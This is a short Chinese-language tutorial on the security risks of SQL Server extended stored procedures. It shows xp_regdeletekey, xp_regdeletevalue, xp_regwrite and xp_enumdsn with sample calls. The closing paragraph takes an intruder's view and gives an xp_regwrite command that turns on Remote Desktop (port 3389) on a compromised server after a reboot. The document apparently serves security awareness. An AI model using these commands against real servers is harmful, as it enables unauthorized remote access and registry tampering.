SQL Server中存储过程的安全问题(4)

xp_regdeletekey (这个扩展存储过程可以删除注册表指定的键，使用时要谨慎)，使用方法(从注册表里删除HKEY_LOCAL_MACHINE\SOFTWARE\aaa)：

EXEC master..xp_regdeletekey

@rootkey='HKEY_LOCAL_MACHINE',

@key='SOFTWARE\aaa'

xp_regdeletevalue(这个扩展存储过程可以删除注册表指定的键里指定的值)，使用方法(要删除键值HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue)：

EXEC master..xp_regdeletevalue

@rootkey='HKEY_LOCAL_MACHINE',

@key='SOFTWARE\aaa',

@value_name='aaaValue'

xp_regwrite(这个扩展存储过程可以写入注册表指定的键里指定的值)，使用方法(在键HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue写入bbb)：

EXEC master..xp_regwrite

@rootkey='HKEY_LOCAL_MACHINE',

@key='SOFTWARE\aaa',

@value_name='aaaValue',

@type='REG_SZ',

@value='bbb'

xp_enumdsn(这个扩展存储过程可以得到ODBC中的用户数据源)，使用方法：

EXEC master..xp_enumdsn

有了上面这些操作注册表的扩展存储过程，入侵者就可以做很多事情了，如果被入侵机器的3389没有被打开，入侵者就可以向被入侵机器的注册表里写入开3389的键值，只要等被入侵机器重新启动后，入侵者就可以连接3389端口了，具体要写哪些键值，网上有很多介绍，大家可以找一下，需要注意的是在查询分析器里运行xp_regwrite存储过程时(注意一条一条运行)，按照下面这种简单的形式运行：

xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\TermDD','start','reg_dword',2

等被入侵机器重新启动后，就可以连接3389端口了。